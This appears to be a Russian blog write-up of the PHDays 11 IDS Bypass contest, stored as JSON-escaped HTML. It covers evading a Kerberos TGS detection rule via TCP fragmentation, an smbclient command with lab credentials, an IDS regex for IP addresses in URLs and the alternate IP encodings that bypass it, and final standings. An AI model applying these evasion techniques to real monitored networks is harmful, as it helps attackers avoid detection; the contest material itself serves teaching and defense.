\u0421\u043b\u043e\u0432\u043e \u00ab\u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439\u00bb \u0437\u0434\u0435\u0441\u044c \u043d\u0435 \u0438\u043c\u0435\u0435\u0442 \u043f\u0440\u044f\u043c\u043e\u0433\u043e \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f, \u0430 \u0432\u0441\u044f \u0444\u0440\u0430\u0437\u0430 \u043b\u0438\u0448\u044c \u043f\u043e\u043c\u043e\u0433\u0430\u043b\u0430 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0443 \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u044c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043d\u0430 TGT-\u0431\u0438\u043b\u0435\u0442.<\/p>\n<p>\u041e\u0441\u0442\u0430\u0432\u0430\u043b\u043e\u0441\u044c \u0442\u0440\u0438 \u0447\u0430\u0441\u0430 \u0434\u043e \u043e\u043a\u043e\u043d\u0447\u0430\u043d\u0438\u044f \u043a\u043e\u043d\u043a\u0443\u0440\u0441\u0430, \u0430 \u0440\u0435\u0448\u0438\u0442\u044c \u044d\u0442\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u043d\u0438\u043a\u0442\u043e \u043d\u0435 \u043c\u043e\u0433. \u0422\u043e\u0433\u0434\u0430 \u0431\u044b\u043b\u0438 \u0434\u0430\u043d\u044b \u0434\u0432\u0435 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0438:<\/p>\n<ul>\n<li>\n<p>Hint for task ABC: Do not stick to the TGT details. Take a look at the whole picture <\/p>\n<\/li>\n<li>\n<p>Hint 2 for task ABC: How many ways of getting TGT you know? <\/p>\n<\/li>\n<\/ul>\n<p>\u0423\u0447\u0430\u0441\u0442\u043d\u0438\u043a psih1337 \u0441\u043c\u043e\u0433 \u043e\u0431\u043e\u0439\u0442\u0438 \u0437\u0430\u0449\u0438\u0442\u0443 IDS \u0438 \u0434\u043e\u0431\u044b\u0442\u044c \u0444\u043b\u0430\u0433, \u043d\u043e \u043f\u043e\u043c\u043e\u0433\u043b\u0430 \u0435\u043c\u0443 \u0432 \u044d\u0442\u043e\u043c \u0435\u0433\u043e \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 (\u0443\u0434\u0438\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u043d\u043e \u044d\u0442\u043e \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0442\u0430\u043a): TGS-\u0437\u0430\u043f\u0440\u043e\u0441 \u0438\u043c\u0435\u0435\u0442 \u0432\u043d\u0443\u0448\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0440\u0430\u0437\u043c\u0435\u0440 (\u043e\u043a\u043e\u043b\u043e \u043f\u043e\u043b\u0443\u0442\u043e\u0440\u0430 \u043a\u0438\u043b\u043e\u0431\u0430\u0439\u0442) \u0438 \u043f\u0440\u0435\u0432\u044b\u0448\u0430\u0435\u0442 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 MTU, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0441\u0435\u0442\u0435\u0432\u043e\u043c\u0443 \u0441\u0442\u0435\u043a\u0443 \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0440\u0430\u0437\u0431\u0438\u0432\u0430\u0442\u044c \u043e\u0434\u0438\u043d \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0434\u0432\u0430 TCP-\u0444\u0440\u0430\u0433\u043c\u0435\u043d\u0442\u0430. \u0412\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u044d\u0442\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c:<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/04d\/526\/498\/04d52649807347ab143e8e9944d4f166.png\" width=\"993\" height=\"36\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/04d\/526\/498\/04d52649807347ab143e8e9944d4f166.png\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0411\u043b\u043e\u043a\u0438\u0440\u0443\u044e\u0449\u0435\u0435 \u043f\u0440\u0430\u0432\u0438\u043b\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u043b\u043e \u043a\u043e\u043d\u0442\u0435\u043d\u0442 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u0438 \u0432 \u043a\u043e\u043d\u0446\u0435 \u043f\u0430\u043a\u0435\u0442\u0430 \u2014 \u0442\u0430\u043a \u0443\u0441\u0442\u0440\u043e\u0435\u043d\u044b Kerberos-\u0437\u0430\u043f\u0440\u043e\u0441\u044b. \u041f\u043e\u043a\u0430 \u041e\u0421 \u0440\u0430\u0437\u0431\u0438\u0432\u0430\u043b\u0430 \u043f\u0430\u043a\u0435\u0442\u044b \u0442\u0430\u043a\u0438\u043c \u0436\u0435 \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u043a\u0430\u043a \u043d\u0430 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0435, \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0441 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435\u043c \u0438 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0430\u0442\u0430\u043a\u0438 \u043d\u0435 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u043b\u043e. \u041e\u0434\u043d\u0430\u043a\u043e \u0441\u043f\u0443\u0441\u0442\u044f \u0442\u0440\u0438 TGS-\u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0431\u0435\u0437 \u043e\u0442\u0432\u0435\u0442\u0430 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0441\u0442\u0435\u043a Windows \u0440\u0430\u0437\u0431\u0438\u0432\u0430\u043b \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0442\u0440\u0438 \u0431\u043e\u043b\u0435\u0435 \u043c\u0435\u043b\u043a\u0438\u0435 \u0447\u0430\u0441\u0442\u0438 \u0440\u0430\u0437\u043c\u0435\u0440\u043e\u043c \u043e\u043a\u043e\u043b\u043e 500 \u0431\u0430\u0439\u0442.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/35e\/c16\/72f\/35ec1672fbe8a4e17a6384b322c6b611.png\" width=\"842\" height=\"273\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/35e\/c16\/72f\/35ec1672fbe8a4e17a6384b322c6b611.png\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0411\u043b\u043e\u043a\u0438\u0440\u0443\u044e\u0449\u0435\u0435 \u043f\u0440\u0430\u0432\u0438\u043b\u043e \u043d\u0435 \u0441\u043f\u0440\u0430\u0432\u0438\u043b\u043e\u0441\u044c \u0441 \u0442\u0430\u043a\u0438\u043c \u0442\u0440\u044e\u043a\u043e\u043c \u0438 \u043f\u0440\u043e\u043f\u0443\u0441\u0442\u0438\u043b\u043e \u0432\u044b\u0434\u0430\u0447\u0443 TGS-\u0431\u0438\u043b\u0435\u0442\u0430. \u041a\u0430\u043a \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442, \u0431\u044b\u043b \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u0444\u043b\u0430\u0433. \u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u0441\u0442\u0435\u043a \u043d\u0430 Linux \u0432\u0435\u0434\u0435\u0442 \u0441\u0435\u0431\u044f \u0434\u0440\u0443\u0433\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0438 \u043d\u0435 \u0440\u0430\u0437\u0431\u0438\u0432\u0430\u0435\u0442 \u043f\u0430\u043a\u0435\u0442 \u043d\u0430 \u0431\u043e\u043b\u0435\u0435 \u043c\u0435\u043b\u043a\u0438\u0435 \u0444\u0440\u0430\u0433\u043c\u0435\u043d\u0442\u044b.<\/p>\n<pre><code>> C:\\Python39\\python.exe smbclient.py ABC.XYZ\/sammy:samm3P@ssw0rd@DC -port 445 -k -debug\u00a0 -dc-ip 10.0.0.233 [+] Trying to connect to KDC at 10.0.0.233 [+] Trying to connect to KDC at 10.0.0.233 [+] Trying to connect to KDC at 10.0.0.233 Type help for list of commands # use FLAG # cat flag.txt flag{Fl4g_was_s0_clos3_but_s0_f4r} # Bye!<\/code><\/pre>\n<p>\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0437\u0430\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0439 \u0432\u0435\u043a\u0442\u043e\u0440 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043d\u0435 \u0431\u044b\u043b \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d, \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u043f\u0435\u0440\u0435\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 IDS Bypass, \u0433\u0434\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u0443\u0436\u0435 \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c.<\/p>\n<h3>\u0417\u0430\u0434\u0430\u043d\u0438\u0435 6: Flask (25 \u043e\u0447\u043a\u043e\u0432)<\/h3>\n<figure class=\"\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/4fe\/482\/5b8\/4fe4825b87e4e27594577fbbb6c1837f.png\" width=\"448\" height=\"100\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/4fe\/482\/5b8\/4fe4825b87e4e27594577fbbb6c1837f.png\"\/><figcaption><\/figcaption><\/figure>\n<p>\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u043d\u0435 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438! \u041e\u043d\u043e \u0431\u044b\u043b\u043e \u0441\u0430\u043c\u044b\u043c \u043f\u0440\u043e\u0441\u0442\u044b\u043c \u0438 \u0438\u043c\u0435\u043b\u043e \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u0439. \u041d\u0430 \u0443\u0437\u043b\u0435 \u0431\u044b\u043b \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440. \u0412 \u0444\u043e\u0440\u043c\u0443 \u043d\u0443\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0432\u0432\u0435\u0441\u0442\u0438 IP-\u0430\u0434\u0440\u0435\u0441, \u0447\u0442\u043e\u0431\u044b \u0441\u0435\u0440\u0432\u0435\u0440 \u043f\u043e\u0441\u043b\u0430\u043b \u0444\u043b\u0430\u0433 \u043d\u0430 \u044d\u0442\u043e\u0442 \u0443\u0437\u0435\u043b.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/1f7\/ba4\/74a\/1f7ba474a8e556d8fe5a68ff5c485c13.png\" width=\"598\" height=\"373\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/1f7\/ba4\/74a\/1f7ba474a8e556d8fe5a68ff5c485c13.png\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0412\u0432\u0435\u0434\u044f \u0441\u0432\u043e\u0439 \u0430\u0434\u0440\u0435\u0441 (10.8.0.26), \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u043f\u043e\u043b\u0443\u0447\u0430\u043b \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u0438\u0435:<\/p>\n<p><code>ATTACK [PTsecurity] IP address in URL. Probably code execution exploit<\/code><\/p>\n<p>\u041c\u0435\u0445\u0430\u043d\u0438\u0437\u043c \u0441\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0441\u0442: \u043f\u0440\u0430\u0432\u0438\u043b\u043e \u0434\u043b\u044f IDS \u0438\u0449\u0435\u0442 IP-\u0430\u0434\u0440\u0435\u0441 \u0432 \u0441\u0442\u0440\u043e\u043a\u0435 URL \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u044b\u043c \u0432\u044b\u0440\u0430\u0436\u0435\u043d\u0438\u0435\u043c: <code>\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}<\/code>. \u0421\u0435\u0440\u0432\u0435\u0440 \u0436\u0435, \u043d\u0430\u043f\u0440\u043e\u0442\u0438\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0432\u0432\u0435\u0434\u0435\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c IP-\u0430\u0434\u0440\u0435\u0441 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 \u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u0432 Scapy, \u0447\u0442\u043e\u0431\u044b \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c ICMP-\u043f\u0430\u043a\u0435\u0442 \u043d\u0430 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0439 \u0443\u0437\u0435\u043b.<\/p>\n<p>\u041a\u0430\u043a \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0444\u043e\u0440\u043c \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f IP-\u0430\u0434\u0440\u0435\u0441\u0430 \u0438 \u043c\u043d\u043e\u0433\u0438\u0435 \u0438\u0437 \u043d\u0438\u0445 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u044e\u0442\u0441\u044f \u0441\u0435\u0442\u0435\u0432\u044b\u043c\u0438 \u0443\u0442\u0438\u043b\u0438\u0442\u0430\u043c\u0438. \u0412\u043e\u0442 \u0442\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u044b \u0443\u0432\u0438\u0434\u0435\u043b\u0438 \u043d\u0430 \u043a\u043e\u043d\u043a\u0443\u0440\u0441\u0435:<\/p>\n<ul>\n<li>\n<p>10.8.0000.26<\/p>\n<\/li>\n<li>\n<p>168296474<\/p>\n<\/li>\n<li>\n<p>10.8.0&#215;0.26<\/p>\n<\/li>\n<li>\n<p>\u0414\u043e\u043c\u0435\u043d\u043d\u043e\u0435 \u0438\u043c\u044f<\/p>\n<\/li>\n<\/ul>\n<p>\u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0441\u0435\u0440\u0432\u0435\u0440 \u043f\u0440\u0438\u0441\u044b\u043b\u0430\u043b \u0444\u043b\u0430\u0433 \u0432 \u0432\u0438\u0434\u0435 \u043f\u0430\u043a\u0435\u0442\u0430 ICMP echo. <\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/560\/6be\/783\/5606be78301557be02863cc4f063d961.png\" width=\"648\" height=\"83\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/560\/6be\/783\/5606be78301557be02863cc4f063d961.png\"\/><figcaption><\/figcaption><\/figure>\n<p>\u041d\u0430\u0434\u0435\u0435\u043c\u0441\u044f, \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0443\u0434\u043e\u0432\u043e\u043b\u044c\u0441\u0442\u0432\u0438\u0435, \u0440\u0435\u0448\u0430\u044f \u044d\u0442\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u0435.<\/p>\n<h3>\u0418\u0442\u043e\u0433\u0438<\/h3>\n<p>\u042d\u0442\u043e \u0431\u044b\u043b \u043e\u0433\u043e\u043d\u044c! \u0411\u043e\u0440\u044c\u0431\u0430 \u0437\u0430 \u043f\u0440\u0438\u0437\u043e\u0432\u044b\u0435 \u043c\u0435\u0441\u0442\u0430 \u0448\u043b\u0430 \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u043c\u0438\u043d\u0443\u0442\u044b: \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a Abr1k0s \u0437\u0430\u043a\u043e\u043d\u0447\u0438\u043b \u043f\u0435\u0440\u0435\u0431\u0438\u0440\u0430\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0432 \u0442\u0430\u0441\u043a\u0435 EVIL.CORP \u0437\u0430 \u043c\u0438\u043d\u0443\u0442\u0443 \u0434\u043e \u043a\u043e\u043d\u0446\u0430 \u043a\u043e\u043d\u043a\u0443\u0440\u0441\u0430 \u0438 \u0432\u043e\u0440\u0432\u0430\u043b\u0441\u044f \u043d\u0430 3-\u0435 \u043c\u0435\u0441\u0442\u043e \u0441\u043e 111 \u043e\u0447\u043a\u0430\u043c\u0438. \u0422\u0435\u043c \u0441\u0430\u043c\u044b\u043c \u043e\u043d \u043d\u0430 \u043e\u0434\u043d\u043e \u043e\u0447\u043a\u043e \u043e\u043f\u0435\u0440\u0435\u0434\u0438\u043b \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0430, \u043e\u043a\u0430\u0437\u0430\u0432\u0448\u0435\u0433\u043e\u0441\u044f \u043d\u0430 4-\u043c \u043c\u0435\u0441\u0442\u0435. \u041f\u043e\u0431\u0435\u0434\u0438\u0442\u0435\u043b\u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0434\u0435\u043d\u0435\u0436\u043d\u044b\u0435 \u043f\u0440\u0438\u0437\u044b \u0438 \u0441\u0443\u0432\u0435\u043d\u0438\u0440\u044b.<\/p>\n<p>\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b:<\/p>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td data-colwidth=\"234\" width=\"234\">\n<p align=\"left\">1\ufe0f\u20e3 psih1337<\/p>\n<\/td>\n<td>\n<p align=\"left\">2\ufe0f\u20e3 OneManTeam<\/p>\n<\/td>\n<td>\n<p align=\"left\">3\ufe0f\u20e3 Abr1k0s<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"234\" width=\"234\">\n<p align=\"left\">? \u041e\u0447\u043a\u0438: 162<\/p>\n<\/td>\n<td>\n<p align=\"left\">? \u041e\u0447\u043a\u0438: 121<\/p>\n<\/td>\n<td>\n<p align=\"left\">? \u041e\u0447\u043a\u0438: 111<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td data-colwidth=\"234\" width=\"234\">\n<p align=\"left\">? \u0420\u0435\u0448\u0435\u043d\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u0439: 6<\/p>\n<\/td>\n<td>\n<p align=\"left\">? \u0420\u0435\u0448\u0435\u043d\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u0439: 5<\/p>\n<\/td>\n<td>\n<p align=\"left\">? \u0420\u0435\u0448\u0435\u043d\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u0439: 5<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>\u0421\u043f\u0430\u0441\u0438\u0431\u043e \u0432\u0441\u0435\u043c! \u0412 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u043c \u0433\u043e\u0434\u0443 \u043c\u044b \u043f\u0440\u0438\u0433\u043e\u0442\u043e\u0432\u0438\u043c \u0434\u043b\u044f \u0432\u0430\u0441 \u0435\u0449\u0435 \u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f. \u0423\u0432\u0438\u0434\u0438\u043c\u0441\u044f \u043d\u0430 PHDays 12!<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w780q1\/getpro\/habr\/upload_files\/10e\/15c\/7ee\/10e15c7ee64914eee3e5c48d84a31218.jpeg\" width=\"2560\" height=\"1707\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/10e\/15c\/7ee\/10e15c7ee64914eee3e5c48d84a31218.jpeg\" data-blurred=\"true\"\/><figcaption><\/figcaption><\/figure>\n<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"v-portal\" style=\"display:none;\"><\/div>\n<\/div>\n<p> <!----> <!----><br \/> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/company\/pt\/blog\/669068\/\"> https:\/\/habr.com\/ru\/company\/pt\/blog\/669068\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<div><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body article-formatted-body_version-2\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<figure class=\"full-width\"><figcaption>\u043a\u043e\u043d\u043a\u0443\u0440\u0441 IDS Bypass \u043d\u0430 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438 Positive Hack Days 11<\/figcaption><\/figure>\n<p>\u041a\u043e\u043d\u043a\u0443\u0440\u0441 IDS Bypass \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u043b \u043d\u0430 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438 Positive Hack Days \u0443\u0436\u0435 \u0432 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u044b\u0439 \u0440\u0430\u0437 (<a href=\"https:\/\/habr.com\/ru\/company\/pt\/blog\/569168\/\">\u0440\u0430\u0437\u0431\u043e\u0440 \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u043f\u0440\u043e\u0448\u043b\u044b\u0445 \u043a\u043e\u043d\u043a\u0443\u0440\u0441\u043e\u0432<\/a>). \u0412 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443 \u043c\u044b \u0441\u0434\u0435\u043b\u0430\u043b\u0438 \u0448\u0435\u0441\u0442\u044c \u0438\u0433\u0440\u043e\u0432\u044b\u0445 \u0443\u0437\u043b\u043e\u0432 \u0441 \u0444\u043b\u0430\u0433\u043e\u043c \u043d\u0430 \u043a\u0430\u0436\u0434\u043e\u043c. \u0414\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0444\u043b\u0430\u0433\u0430 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0443 \u043f\u0440\u0435\u0434\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u043b\u0438\u0431\u043e \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435, \u043b\u0438\u0431\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0434\u0440\u0443\u0433\u043e\u0435 \u0443\u0441\u043b\u043e\u0432\u0438\u0435, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u043f\u0435\u0440\u0435\u0431\u0440\u0430\u0442\u044c \u0441\u043f\u0438\u0441\u043a\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435. <\/p>\n<p>\u0421\u0430\u043c\u0438 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u044b\u043b\u0438 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u044b\u043c\u0438. \u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u043b \u043e\u0431\u0445\u043e\u0434 IDS: \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0438\u043d\u0441\u043f\u0435\u043a\u0442\u0438\u0440\u0443\u0435\u0442 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0442\u0440\u0430\u0444\u0438\u043a \u043e\u0442 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u043e\u0432 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u043c\u0438 \u043f\u0440\u0430\u0432\u0438\u043b\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0449\u0443\u0442 \u0430\u0442\u0430\u043a\u0438. \u0415\u0441\u043b\u0438 \u0442\u0430\u043a\u043e\u0435 \u043f\u0440\u0430\u0432\u0438\u043b\u043e \u0441\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442, \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0430 \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0438 \u0431\u043e\u0442 \u043f\u0440\u0438\u0441\u044b\u043b\u0430\u0435\u0442 \u0435\u043c\u0443 \u0442\u0435\u043a\u0441\u0442 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u0432\u0448\u0435\u0433\u043e \u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0432 \u0422\u0435\u043b\u0435\u0433\u0440\u0430\u043c. <\/p>\n<p>\u0418 \u0434\u0430, \u0432 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443 \u043c\u044b \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u043b\u0438 \u0443\u0439\u0442\u0438 \u043e\u0442 \u043f\u0440\u0438\u0432\u044b\u0447\u043d\u044b\u0445 CTFd \u0438 \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432 IDS \u0432 \u0441\u0442\u043e\u0440\u043e\u043d\u0443 \u0431\u043e\u043b\u0435\u0435 \u0443\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u0442\u0435\u043b\u0435\u0433\u0440\u0430\u043c-\u0431\u043e\u0442\u0430. \u0414\u043b\u044f \u0443\u0447\u0430\u0441\u0442\u0438\u044f \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0431\u044b\u043b\u043e \u0432\u0441\u0435\u0433\u043e \u043b\u0438\u0448\u044c \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0431\u043e\u0442\u0443 \u0438 \u0432\u044b\u0431\u0440\u0430\u0442\u044c \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u0417\u0430\u0442\u0435\u043c \u043e\u043d \u043f\u0440\u0438\u0441\u044b\u043b\u0430\u043b OVPN-\u0444\u0430\u0439\u043b \u0434\u043b\u044f \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043a \u0438\u0433\u0440\u043e\u0432\u043e\u0439 \u0441\u0435\u0442\u0438, \u0438 \u0432 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c \u0432\u0441\u0435 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0435 (\u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440 \u0437\u0430\u0434\u0430\u043d\u0438\u0439 \u0438 \u0438\u0433\u0440\u043e\u0432\u043e\u0433\u043e \u0434\u0430\u0448\u0431\u043e\u0440\u0434\u0430, \u0441\u0434\u0430\u0447\u0430 \u0444\u043b\u0430\u0433\u043e\u0432) \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u043b\u043e 